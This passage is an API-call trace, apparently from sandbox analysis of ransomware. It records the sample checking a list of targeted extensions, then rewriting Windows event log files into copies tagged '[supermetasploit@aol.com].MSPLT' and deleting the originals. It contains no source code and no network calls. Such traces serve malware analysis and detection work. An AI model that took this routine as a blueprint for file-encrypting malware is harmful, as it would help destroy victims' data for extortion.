(lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.151] lstrlenW (lpString=".doc") returned 4 [0288.151] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.151] lstrlenW (lpString=".docx") returned 5 [0288.151] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.151] lstrlenW (lpString=".pdf") returned 4 [0288.151] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.151] lstrlenW (lpString=".xls") returned 4 [0288.151] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.151] lstrlenW (lpString=".xlsx") returned 5 [0288.151] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.151] lstrlenW (lpString=".ppt") returned 4 [0288.151] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.151] lstrlenW (lpString=".zip") returned 4 [0288.151] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString=".rar") returned 4 [0288.152] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString=".bz2") returned 4 [0288.152] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString=".7z") returned 3 [0288.152] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.152] lstrlenW (lpString=".dbf") returned 4 [0288.152] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.152] lstrlenW (lpString=".1cd") returned 4 [0288.152] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.152] lstrlenW (lpString=".jpg") returned 4 [0288.152] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.152] lstrlenW (lpString=".doc") returned 4 [0288.152] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString=".docx") returned 5 [0288.152] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.152] lstrlenW (lpString=".pdf") returned 4 [0288.152] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.152] lstrlenW (lpString=".xls") returned 4 [0288.152] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString=".xlsx") returned 5 [0288.153] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.153] lstrlenW (lpString=".ppt") returned 4 [0288.153] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.153] lstrlenW (lpString=".zip") returned 4 [0288.153] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString=".rar") returned 4 [0288.153] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString=".bz2") returned 4 [0288.153] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString=".7z") returned 3 [0288.153] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.153] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.153] lstrlenW (lpString=".dbf") returned 4 [0288.153] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.153] lstrlenW (lpString=".1cd") returned 4 [0288.153] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.153] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0288.153] lstrlenW (lpString=".jpg") returned 4 [0288.153] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.153] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.154] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Operational.evtx") returned 48 [0288.154] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0288.258] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=1118208) returned 1 [0288.259] CloseHandle (hObject=0x448) returned 1 [0288.259] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 0x20 [0288.259] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.259] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0288.259] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.259] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.259] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0288.261] GetLastError () returned 0x0 [0288.261] ReadFile (in: hFile=0x448, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0288.293] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0288.470] ReadFile (in: hFile=0x448, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11010, lpOverlapped=0x0) returned 1 [0288.810] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11020, lpOverlapped=0x0) returned 1 [0288.820] ReadFile (in: hFile=0x448, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0288.820] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x134, lpOverlapped=0x0) returned 1 [0288.821] SetEndOfFile (hFile=0x3b0) returned 1 [0288.821] CloseHandle (hObject=0x3b0) returned 1 [0289.356] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.356] SetEndOfFile (hFile=0x448) returned 1 [0289.359] CloseHandle (hObject=0x448) returned 1 [0289.359] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.359] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 1 [0289.360] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.360] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.360] lstrlenW (lpString=".doc") returned 4 [0289.360] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.360] lstrlenW (lpString=".docx") returned 5 [0289.360] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.360] lstrlenW (lpString=".pdf") returned 4 [0289.360] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.360] lstrlenW (lpString=".xls") returned 4 [0289.360] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.360] lstrlenW (lpString=".xlsx") returned 5 [0289.360] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.360] lstrlenW (lpString=".ppt") returned 4 [0289.360] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.360] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.360] lstrlenW (lpString=".zip") returned 4 [0289.360] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.360] lstrlenW (lpString=".rar") returned 4 [0289.360] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString=".bz2") returned 4 [0289.361] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString=".7z") returned 3 [0289.361] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.361] lstrlenW (lpString=".dbf") returned 4 [0289.361] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.361] lstrlenW (lpString=".1cd") returned 4 [0289.361] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.361] lstrlenW (lpString=".jpg") returned 4 [0289.361] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.361] lstrlenW (lpString=".doc") returned 4 [0289.361] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.361] lstrlenW (lpString=".docx") returned 5 [0289.361] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.362] lstrlenW (lpString=".pdf") returned 4 [0289.362] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString=".xls") returned 4 [0289.362] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString=".xlsx") returned 5 [0289.362] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.362] lstrlenW (lpString=".ppt") returned 4 [0289.362] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.362] lstrlenW (lpString=".zip") returned 4 [0289.362] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString=".rar") returned 4 [0289.362] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString=".bz2") returned 4 [0289.362] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.362] lstrlenW (lpString=".7z") returned 3 [0289.362] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.362] lstrlenW (lpString=".dbf") returned 4 [0289.363] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.363] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.363] lstrlenW (lpString=".1cd") returned 4 [0289.363] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.363] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0289.363] lstrlenW (lpString=".jpg") returned 4 [0289.363] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.363] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.363] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 48 [0289.363] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0289.364] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0289.364] CloseHandle (hObject=0x448) returned 1 [0289.364] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 0x20 [0289.364] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.519] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0289.550] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.550] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.550] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0289.552] GetLastError () returned 0x0 [0289.552] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.558] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.562] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0289.562] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x134, lpOverlapped=0x0) returned 1 [0289.562] SetEndOfFile (hFile=0x45c) returned 1 [0289.562] CloseHandle (hObject=0x45c) returned 1 [0289.570] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.570] SetEndOfFile (hFile=0x44c) returned 1 [0289.583] CloseHandle (hObject=0x44c) returned 1 [0289.583] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.584] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 1 [0289.584] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.584] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.584] lstrlenW (lpString=".doc") returned 4 [0289.584] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".docx") returned 5 [0289.585] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.585] lstrlenW (lpString=".pdf") returned 4 [0289.585] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".xls") returned 4 [0289.585] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".xlsx") returned 5 [0289.585] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.585] lstrlenW (lpString=".ppt") returned 4 [0289.585] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.585] lstrlenW (lpString=".zip") returned 4 [0289.585] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".rar") returned 4 [0289.585] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".bz2") returned 4 [0289.585] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.585] lstrlenW (lpString=".7z") returned 3 [0289.585] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.585] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.585] lstrlenW (lpString=".dbf") returned 4 [0289.586] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.586] lstrlenW (lpString=".1cd") returned 4 [0289.586] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.586] lstrlenW (lpString=".jpg") returned 4 [0289.586] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.586] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.586] lstrlenW (lpString=".doc") returned 4 [0289.586] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString=".docx") returned 5 [0289.586] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.586] lstrlenW (lpString=".pdf") returned 4 [0289.586] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString=".xls") returned 4 [0289.586] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.586] lstrlenW (lpString=".xlsx") returned 5 [0289.586] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.586] lstrlenW (lpString=".ppt") returned 4 [0289.586] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.587] lstrlenW (lpString=".zip") returned 4 [0289.587] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString=".rar") returned 4 [0289.587] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString=".bz2") returned 4 [0289.587] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString=".7z") returned 3 [0289.587] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.587] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.587] lstrlenW (lpString=".dbf") returned 4 [0289.587] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.587] lstrlenW (lpString=".1cd") returned 4 [0289.587] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.587] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0289.587] lstrlenW (lpString=".jpg") returned 4 [0289.587] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.587] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.587] lstrlenW (lpString="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 43 [0289.587] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0289.588] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0289.588] CloseHandle (hObject=0x44c) returned 1 [0289.588] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 0x20 [0289.588] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.588] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0289.588] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.589] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.589] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0289.589] GetLastError () returned 0x0 [0289.589] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.991] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.994] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0289.994] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x12a, lpOverlapped=0x0) returned 1 [0289.994] SetEndOfFile (hFile=0x45c) returned 1 [0289.994] CloseHandle (hObject=0x45c) returned 1 [0290.000] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.000] SetEndOfFile (hFile=0x44c) returned 1 [0290.002] CloseHandle (hObject=0x44c) returned 1 [0290.002] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.002] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 1 [0290.002] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.003] lstrlenW (lpString=".doc") returned 4 [0290.003] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString=".docx") returned 5 [0290.003] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.003] lstrlenW (lpString=".pdf") returned 4 [0290.003] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString=".xls") returned 4 [0290.003] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString=".xlsx") returned 5 [0290.003] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.003] lstrlenW (lpString=".ppt") returned 4 [0290.003] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.003] lstrlenW (lpString=".zip") returned 4 [0290.003] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned 